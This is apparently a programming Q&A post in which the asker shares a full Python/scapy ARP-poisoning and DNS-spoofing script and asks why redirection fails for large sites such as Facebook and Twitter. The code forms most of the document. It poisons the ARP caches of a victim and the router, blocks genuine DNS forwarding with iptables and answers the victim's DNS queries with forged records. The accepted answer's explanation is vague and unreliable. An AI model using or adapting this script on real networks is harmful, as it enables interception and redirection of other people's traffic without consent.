# my dns spoofing only works with some sites?

Tags: python, security, dns, arp

I created a DNF spoofer (with ARP poisoning) in python just for fun. My goal is just to redirect a victim's dns requests to my site. so whenever they go to any website, they go to my site instead. However it only seems to work on some sites not all of them, doesn't seem to work when they go to sites like twitter or facebook, but when going to google or smaller sites they get redirected just fine? I'm also using iptables rules in my code to block all dns from the router.

Anyone know why?

code:

```
#command line arguments
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)

args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
localMAC = ""
victimMAC = ""
routerMAC = ""

#Setup function
def setup():
    #setup forwarding rules
    #disable forwarding of DNS requests to router
    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
    #iptables rule
    Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)

#Flush iptables on exit
def reset():
    Popen(["iptables -F"], shell=True, stdout=PIPE)

#get MACaddress of local machine
def getOurMAC(interface):
    try:
        mac = open('/sys/class/net/'+interface+'/address').readline()
    except:
        mac = "00:00:00:00:00:00"
    return mac[0:17]


#returns MAC address of victim IP
def getTargetMAC(IP):
    #add the target to our system's ARP cache
    pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
    pid = Popen(["arp", "-n", IP], stdout=PIPE)
    s = pid.communicate()[0]
    MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]

    return MAC


#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
    arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
    arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
    print str(vIP) + " has been poisoned."
    while True:
        try:
            sendp(arpPacketVictim, verbose=0)
            sendp(arpPacketRouter, verbose=0)
            #pause between each send
            time.sleep(3)
        except KeyboardInterrupt:
            sys.exit(0)

#construct and send a spoofed DNS response packet to the victim
def reply(packet):
    global targetIP
    responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
                    DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
    send(responsePacket, verbose=0)
    print "Sent spoofed DNS Packet"
    return

#this parse creates a thread
def parse(packet):
    if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
        replyThread = threading.Thread(target=reply, args=packet)
        replyThread.start()

#initiate sniff filter for DNS requests
def DNSsniffer():
    global vIP
    print "Sniffing DNS"
    sniffFilter = "udp and port 53 and src " +str(vIP)
    sniff(filter=sniffFilter, prn=parse)

# main function
def main():
    victimMAC = getTargetMAC(vIP)
    localMAC = getOurMAC("eno1")#Datacomm card
    routerMAC = getTargetMAC(routerIP)

    #threads creation
    ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
    sniffThread = threading.Thread(target=DNSsniffer)
    #
    ARPThread.daemon = True
    sniffThread.daemon = True
    #
    ARPThread.start()
    sniffThread.start()

    #Keyboard Interrupt
    while True:
        try:
            time.sleep(5)
        except KeyboardInterrupt:
            reset()
            print "Exiting"
            sys.exit(0)

#--------------------------------------------------
setup()
main()
```

UPDATE: 
I have done some further testing, it seems to redirect just fine when the victim is going to sites like google. Fast loading sites, but for bigger sites, like facebook or twitter, it just seems to load forever.

instead of spawning threads, could I spawn processes instead?

Comment: Maybe they have the name already resolved, in local DNS cache

Comment: I have tried that, but doesn't seem to work, facebook and twitter just seem to keep loading forever, even though my program is trying to send the spoof dns packets.

Answer (score 0, accepted):

Turns out it's just the security on facebook and twitter blocking spoofing all together, nothing wrong with my code.